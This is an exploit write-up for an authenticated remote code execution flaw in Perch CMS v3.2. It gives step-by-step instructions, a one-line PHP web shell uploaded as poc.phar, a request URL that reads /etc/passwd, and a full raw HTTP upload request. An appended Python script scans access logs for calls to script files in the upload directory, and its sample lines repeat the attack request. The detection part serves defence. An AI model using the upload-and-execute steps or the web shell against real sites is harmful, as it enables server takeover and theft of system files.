
Perch v3.2 - Remote Code Execution (RCE)

HackApt-37 Team (verified member)

Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
Application: Perch CMS
Version: v3.2
Bugs: RCE
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details and POC
====================================================
Steps:
1. Log in to the account as admin.
2. Go to Assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
3. Add an asset (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
4. Upload the poc.phar file.

poc.phar file contents:
<?php $a=$_GET['code']; echo system($a);

5. Visit http://localhost/perch_v3.2/perch/resource/admin/poc.phar?code=cat%20/etc/passwd

POC request:

POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
Host: localhost
Content-Length: 1071
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryygoerzn09hhsjd4z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpwcmsbelang=en; CMSA=1; PHPSESSID=689RDJ63VOOR49DCFM9RDPOLC9
Connection: close

------WebKitFormBoundaryygoerzn09hhsjd4z
Content-Disposition: form-data; name="Resourcetitle"

test
------WebKitFormBoundaryygoerzn09hhsjd4z
Content-Disposition: form-data; name="image"; filename="poc.phar"
Content-Type: application/octet-stream

<?php $a=$_GET['code']; echo system($a);
------WebKitFormBoundaryygoerzn09hhsjd4z
Content-Disposition: form-data; name="image_field"

1
------WebKitFormBoundaryygoerzn09hhsjd4z
Content-Disposition: form-data; name="image_assetid"


------WebKitFormBoundaryygoerzn09hhsjd4z
Content-Disposition: form-data; name="Resourcebucket"

admin
------WebKitFormBoundaryygoerzn09hhsjd4z
Content-Disposition: form-data; name="tags"

test
------WebKitFormBoundaryygoerzn09hhsjd4z
Content-Disposition: form-data; name="btnsubmit"

Submit
------WebKitFormBoundaryygoerzn09hhsjd4z
Content-Disposition: form-data; name="formaction"

edit
------WebKitFormBoundaryygoerzn09hhsjd4z
Content-Disposition: form-data; name="token"

5494AF3E8DBE5AC399CA7F12219CFE82
------WebKitFormBoundaryygoerzn09hhsjd4z--
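
Added example (not part of the original post and not Perch's own code): a detection check over web-server access logs for the behaviour in step 5, a request for a PHP-executable file under the upload directory. The extension set, the log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: extensions the web server may pass to the PHP interpreter.
# Match this set to your own handler configuration.
PHP_EXTS = {".php", ".phar", ".phtml", ".pht", ".php5", ".php7"}
# Upload directory prefix as it appears in the URL from step 5 of the post.
UPLOAD_PREFIX = "/perch_v3.2/perch/resource/"
# Assumption: common/combined access log format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jul/2023:10:01:12 +0000] "POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1" 302 512',
    '203.0.113.7 - - [21/Jul/2023:10:01:20 +0000] "GET /perch_v3.2/perch/resource/admin/poc.phar?code=cat%20/etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.4 - - [21/Jul/2023:10:02:00 +0000] "GET /perch_v3.2/perch/resource/admin/logo.png HTTP/1.1" 200 2048',
]

def script_ext(path):
    """Return the first PHP-executable extension in the file name, or None.

    Every dot-separated suffix is checked, so 'x.phar.jpg' and 'X.PHAR'
    are reported as well as a plain 'x.phar'.
    """
    name = path.rsplit("/", 1)[-1].lower()
    for part in name.split(".")[1:]:
        if "." + part in PHP_EXTS:
            return "." + part
    return None

def find_upload_execution(lines, prefix=UPLOAD_PREFIX):
    """Return one record per request for a script-type file under the upload prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path)  # decode %xx so encoded extensions are not missed
        ext = script_ext(path)
        if path.startswith(prefix) and ext:
            hits.append({"ip": ip, "time": ts, "method": method, "path": path,
                         "ext": ext, "status": int(status), "has_query": bool(url.query)})
    return hits

if __name__ == "__main__":
    for hit in find_upload_execution(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the file was served from the upload directory; whether it was executed depends on the server's PHP handler mapping, so the complementary control is to serve that directory as static files only.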
 